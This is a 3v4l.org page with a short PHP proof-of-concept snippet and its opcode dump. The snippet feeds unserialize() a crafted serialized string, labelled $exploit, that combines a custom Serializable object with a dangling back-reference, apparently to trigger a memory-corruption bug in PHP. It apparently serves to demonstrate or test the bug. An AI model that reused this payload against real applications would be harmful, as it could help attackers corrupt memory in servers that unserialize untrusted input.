3v4l.org

run code in 300+ PHP versions simultaneously
<?php class obj implements Serializable { var $data; function serialize() { return serialize($this->data); } function unserialize($data) { $this->data = unserialize($data); } } $inner = 'a:2:{i:0;i:1;i:1;i:2'; $exploit = 'a:2:{i:0;C:3:"obj":'.strlen($inner).':{'.$inner.'}i:1;R:5;}'; $data = unserialize($exploit); for ($i = 0; $i < 5; $i++) { $v[$i] = 'hi'.$i; } var_dump($data);
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 42) Position 1 = 18
Branch analysis from position: 18
2 jumps found. (Code = 44) Position 1 = 20, Position 2 = 14
Branch analysis from position: 20
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 14
2 jumps found. (Code = 44) Position 1 = 20, Position 2 = 14
Branch analysis from position: 20
Branch analysis from position: 14
filename:       /in/gDfuY
function name:  (null)
number of ops:  24
compiled vars:  !0 = $inner, !1 = $exploit, !2 = $data, !3 = $i, !4 = $v
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    3     0  E >   DECLARE_CLASS                                            'obj'
   13     1        ASSIGN                                                   !0, 'a%3A2%3A%7Bi%3A0%3Bi%3A1%3Bi%3A1%3Bi%3A2'
   14     2        STRLEN                                           ~6      !0
          3        CONCAT                                           ~7      'a%3A2%3A%7Bi%3A0%3BC%3A3%3A%22obj%22%3A', ~6
          4        CONCAT                                           ~8      ~7, '%3A%7B'
          5        CONCAT                                           ~9      ~8, !0
          6        CONCAT                                           ~10     ~9, '%7Di%3A1%3BR%3A5%3B%7D'
          7        ASSIGN                                                   !1, ~10
   16     8        INIT_FCALL                                               'unserialize'
          9        SEND_VAR                                                 !1
         10        DO_ICALL                                         $12     
         11        ASSIGN                                                   !2, $12
   18    12        ASSIGN                                                   !3, 0
         13      > JMP                                                      ->18
   19    14    >   CONCAT                                           ~16     'hi', !3
         15        ASSIGN_DIM                                               !4, !3
         16        OP_DATA                                                  ~16
   18    17        PRE_INC                                                  !3
         18    >   IS_SMALLER                                               !3, 5
         19      > JMPNZ                                                    ~18, ->14
   22    20    >   INIT_FCALL                                               'var_dump'
         21        SEND_VAR                                                 !2
         22        DO_ICALL                                                 
         23      > RETURN                                                   1

Class obj:
Function serialize:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/gDfuY
function name:  serialize
number of ops:  6
compiled vars:  none
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    6     0  E >   INIT_FCALL                                               'serialize'
          1        FETCH_OBJ_R                                      ~0      'data'
          2        SEND_VAL                                                 ~0
          3        DO_ICALL                                         $1      
          4      > RETURN                                                   $1
    7     5*     > RETURN                                                   null

End of function serialize

Function unserialize:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/gDfuY
function name:  unserialize
number of ops:  7
compiled vars:  !0 = $data
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    8     0  E >   RECV                                             !0      
    9     1        INIT_FCALL                                               'unserialize'
          2        SEND_VAR                                                 !0
          3        DO_ICALL                                         $2      
          4        ASSIGN_OBJ                                               'data'
          5        OP_DATA                                                  $2
   10     6      > RETURN                                                   null

End of function unserialize

End of class obj.

Generated using Vulcan Logic Dumper, using php 8.0.0

preferences:
166.13 ms | 1400 KiB | 19 Q